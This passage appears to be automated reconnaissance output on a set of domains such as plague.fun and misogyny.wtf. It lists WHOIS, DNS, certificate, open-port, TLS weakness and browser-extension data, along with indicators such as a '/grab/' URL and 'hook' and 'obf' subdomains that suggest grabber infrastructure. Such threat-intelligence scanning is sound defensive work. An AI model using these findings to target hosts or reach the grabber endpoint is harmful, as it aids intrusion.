substantial part of the content of the WHOIS database. % % By submitting the query you agree to abide by this policy and accept % that EURid can take measures to limit the use of its WHOIS services % in order to protect the privacy of its registrants or the integrity % of the database. % % The EURid WHOIS service on port 43 (textual whois) never % discloses any information concerning the registrant. % Registrant and on-site contact information can be obtained through use of the % webbased WHOIS service available from the EURid website www.eurid.eu % % WHOIS plague.eu Domain: plague.eu Script: LATIN Registrant: NOT DISCLOSED! Visit www.eurid.eu for webbased WHOIS. On-site(s): NOT DISCLOSED! Visit www.eurid.eu for webbased WHOIS. Reseller: Organisation: SECOMMERCE GmbH Language: en Email: domains@secommerce.com Registrar: Name: Realtime Register B.V. Website: https://www.realtimeregister.com Name servers: ns2.sedoparking.com ns1.sedoparking.com Please visit www.eurid.eu for more info. plague.eu 2022-12-18 00:12:04 Country No Country Name Extractor 0 0 3 0 None United States amenworld.com 2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.9 2022-12-18 00:09:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.2:80 188.114.96.0/24 2022-12-18 00:07:06 HTTP Headers No Web Spider 1 0 2 0 None {"date": "Sun, 18 Dec 2022 00:07:06 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 2022-12-18 00:14:46 Internet Name - Unresolved No VirusTotal 0 0 1 0 None obf.plague.fun plague.fun 2022-12-18 00:03:19 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-108.w90-116.abo.wanadoo.fr 90.116.166.108 2022-12-18 00:09:31 Open TCP Port No LeakIX 0 0 2 0 None 172.67.169.215:443 172.67.169.215 2022-12-18 00:20:42 Open TCP Port No LeakIX 0 0 3 0 None 81.88.48.102:443 81.88.48.102 2022-12-18 00:14:05 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-6329 https://nvd.nist.gov/vuln/detail/CVE-2016-6329 Score: 4.3 Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. 188.114.97.3 2022-12-18 00:27:14 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.102:443 81.88.48.102 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.28.240 2022-12-18 00:30:48 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.app plague.fun 2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None securemail.pro tb-fr.securemail.pro 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None misogyny.wtf. 1800 IN MX 20 eforward5.registrar-servers.com. misogyny.wtf. 1800 IN MX 15 eforward4.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward1.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward2.registrar-servers.com. misogyny.wtf. 1800 IN MX 10 eforward3.registrar-servers.com. misogyny.wtf 2022-12-18 00:21:03 Web Technology No Web Server Identifier 0 0 4 0 None Express {"content-length": "998", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"3e6-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:19 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"} 2022-12-18 00:21:03 Web Technology No Web Server Identifier 0 0 3 0 None Express {"content-length": "1078", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Thu, 03 Nov 2022 03:05:34 GMT", "connection": "keep-alive", "etag": "W/\"436-1843b737830\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:17 GMT", "access-control-allow-origin": "*", "content-type": "text/html; charset=UTF-8"} 2022-12-18 00:10:49 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.96.1 2022-12-18 00:02:55 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 plague.fun 2022-12-18 00:31:50 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: PLAGUE.ONL Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-11-06T10:11:01Z Creation Date: 2019-11-05T05:26:43Z Registry Expiry Date: 2023-11-05T05:26:43Z Registrar Registration Expiration Date: Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Domains By Proxy, LLC Registrant State/Province: Arizona Registrant Country: US Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain Name: plague.onl Registry Domain ID: D425500000332721757-AGRS Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-11-06T10:10:59Z Creation Date: 2019-11-05T05:26:43Z Registrar Registration Expiration Date: 2023-11-05T05:26:43Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR394993769 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Admin ID: CR394993781 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Registry Tech ID: CR394993775 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.onl Name Server: NS65.DOMAINCONTROL.COM Name Server: NS66.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. plague.onl 2022-12-18 00:14:30 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.97.3] https://isc.sans.edu/api/ip/188.114.97.3 188.114.97.3 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +19854014545 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 0 0 1 0 None http://misogyny.wtf:8080/ misogyny.wtf 2022-12-18 00:07:29 HTTP Status Code No Web Spider 0 0 2 0 None None http://20.224.2.213/ 2022-12-18 00:12:44 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3036::ac43:a9d7 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None info@newtabgallery.com [{"platform": "Chrome", "version": "0.37", "data": {"extcalls": ["https://home.newtabgallery.com/", "https://newtabgallery.com/welcome/?theme_id=", "https://newtabgallery.com/uninstall/?theme_id"], "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2018-12-23", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "", "support_site": "https://www.newtabgallery.com/support", "version": "", "address": "", "short_description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "permission_warnings": [], "users": 60, "size": "413KiB", "type": "Extension", "email": "info@newtabgallery.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"webstore": {"website": 1, "last_updated": 5, "users": 1, "address": 1, "total": 9, "rating_users": 1}, "metadata": {}, "total": 411, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 25}}, "related": {"gapecdeolbiphmnkcigpgmncnhjnkhom": {"rating": 3, "users": 466, "platform": "", "short_description": "CS GO wallpapers extension offers great images with every new tab and was made for all fans of CS GO.", "icon": "https://lh3.googleusercontent.com/Q6A61RgzCT3Fsha5p3p_mYUuD_ulqAPXk7PqjmQ0kKyA7-gCxlIDyggIfaIGhhAvmO0UFfQk0cZbcTBVSG7iQtCh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1, "name": "CS GO HD Wallpapers New Tab"}, "fpmmkkfgclmhcolgmcpjdkfpehgbedim": {"rating": 5, "users": 1000, "platform": "", "short_description": "Replace your new tab with the PUBG Features Custom page, with bookmarks, apps, games and PUBG Game pride wallpaper.", "icon": "https://lh3.googleusercontent.com/8FgkvHkd8sXLvGpg-QpO56iMck1xP9Bv3bV6OwkflKNyr6P2t8wDU1tCFg_N3rlo4f8T730LemwO9w1rH_uQ_t5o=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5, "name": "PUBG Features Wallpapers HD New Tab"}, "hhpdpohbancinfchpkgliloaocffpceb": {"rating": 3.3666666, "users": 776, "platform": "", "short_description": "Are you ready to be a gunner? Knock balls is a shooting game. Hard levels await you.", "icon": "https://lh3.googleusercontent.com/roRilPyAjm7U77eNqM3m2geyI7mMVOEsYkMdZpqIOQS6cO3GhqVYfi9fHPLCNM2lNCjWZB-HmOQpvaDvJGH7MzyDE_A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Knock Balls Game New Tab"}, "dodmbeoncpkfkefgbfiahafdgiccfhmb": {"rating": 4.9995656, "users": 5050, "platform": "", "short_description": "Check Out Our Fortnite Lama Live Wallpapers And Mini Games Date And Time Widgets...", "icon": "https://lh3.googleusercontent.com/76unrUKGATgdPR0Zl3po_OK3mWOQ82IhyHePJdSoxHIIw4pgCnqruTlz8g85NzGl5oqaV0fU0Kk=w128-h128-e365", "rating_users": 2301, "name": "Fortnite Lama Live New Tab Backgrounds"}, "pmnbmfmpehpncbfjfpnfailicicocaap": {"rating": 3.3043478, "users": 1482, "platform": "", "short_description": "Do you like American football game? Believe in yourself, see the goalkeeper and the wall that you really need to pass.", "icon": "https://lh3.googleusercontent.com/jluPSHf4IjMjgqd0rNVMuTfq1f4786G1iiu5koA7B4jo2el8s3MKIzpNpo-cmXd9ET9SnGZW=w128-h128-e365", "rating_users": 23, "name": "Kick Return Football"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "klaadibaiofhdchfigelkbnoilocpapa": {"rating": 1.7822802, "users": 100000, "platform": "", "short_description": "New tab themes with Clash Royale HD wallpapers made by fans for fans of Clash Royale.", "icon": "https://lh3.googleusercontent.com/Zz6C2fCYPAHQ9G9Z9rnDfohq1lnrZPvzCCT0vZkxEOnEOb-35_EZkNvdjWX8ALQpAqLlTdEul2A=w128-h128-e365", "rating_users": 2912, "name": "Clash Royale Wallpaper HD New Tab Themes"}, "fedenmemklhminihgehhicdmabenpkhd": {"rating": 3.6133332, "users": 1000, "platform": "", "short_description": "Fortnite wallpapers extension offers great images with every new tab and was made for all fans of Fortnite wallpaper.", "icon": "https://lh3.googleusercontent.com/DDwo5cVMwI5AIhAp_pmp6dCl7JL38sHImtQCS2gjwmiO2iGtwrmdQfst1YlkUq2wQE-N4ixZzwTyr2lpHWEXdp_tfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 75, "name": "Fortnite Game Full HD Wallpaper New Tab"}, "dephgmdllolfchlbencncbldjdnkdbok": {"rating": 3.1818182, "users": 735, "platform": "", "short_description": "Minecraft Classic wallpaper extension offers great images with every new tab and was made for all fans of Minecraft.", "icon": "https://lh3.googleusercontent.com/dM50b9FV4NBcF-X2FZPwy0kUtjr5uAf_1wvRVnVhPHiT0OzLRE6h7NCKBYDrgwrVikJc1qWIZBw91eUo-lAYKJ7F=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11, "name": "Minecraft Classic HD Wallpapers New Tab"}, "hbioademamgcidpknbkilibejpjhhoak": {"rating": 3.8666666, "users": 0, "platform": "", "short_description": "Among Us Skin wallpapers extension offers great images with every new tab and was made for all fans of Among Us.", "icon": "https://lh3.googleusercontent.com/li2kmYtixEszT4j4Le_YmQs49UUBS8X3gG00bFEbdNf16BEBDOxwf6doLGLTN3dBepgsAwyg0at3Wn2rhnoazmLp=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 45, "name": "Among Us Skin HD Wallpaper New Tab"}, "omihfdplpkjcgdkdhoeaclgappcanifp": {"rating": 3.3085105, "users": 0, "platform": "", "short_description": "Among us wallpaper extension offers great images with every new tab and was made for all fans of among us.", "icon": "https://lh3.googleusercontent.com/YaKEbQcoP38TLla09rRswmU6hU8dR1-9nHTE7LYzAPwCm5_pK4TEjA6grkmDEODxAr6_1m-2N9EQbjC9suBfKzkEtA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 94, "name": "Among US Game HD Wallpapers New Tab"}, "dnnkelgikdlinelhmlpipkipmnfeplhp": {"rating": 4.0833335, "users": 284, "platform": "", "short_description": "Cat wallpapers extension offers great images with every new tab and was made for all fans of Cat.", "icon": "https://lh3.googleusercontent.com/I_EAJDo-eiJhq-8CLSqi3_SGwaA57lw48w0g_SRK3a7BS3vBZvWH0o6HBCMarfyB9zWaJRlDcgaY5E3P4k3G6Vop=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 24, "name": "Cat HD Wallpaper New Tab"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": "XXXTentacion 4K Wallpapers New Tab"}, "fiaeliimiajnkmkncccmccnlcpcelpee": {"rating": 3.5, "users": 2000, "platform": "", "short_description": "Roblox wallpaper extension offers great images with every new tab and was made for all fans of Roblox wallpapers.", "icon": "https://lh3.googleusercontent.com/ChzPepItXsUfcsLgwHN82g5n1KCZo_ssLSO4u-NZqZLypgQvBs-Zrbv7V8r6q6py9pAlZrnm-FRAKYgQD-BqofVR=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 22, "name": "Roblox Game HD Wallpapers New Tab"}, "oefnjcadfloohhbchkdmgoecoohonhpn": {"rating": 4.7777777, "users": 1000, "platform": "", "short_description": "Install PUBG HD Wallpapers New Tab Theme ang get HD images of PlayerUnknown's Battlegrounds Battle Royale gameplay.", "icon": 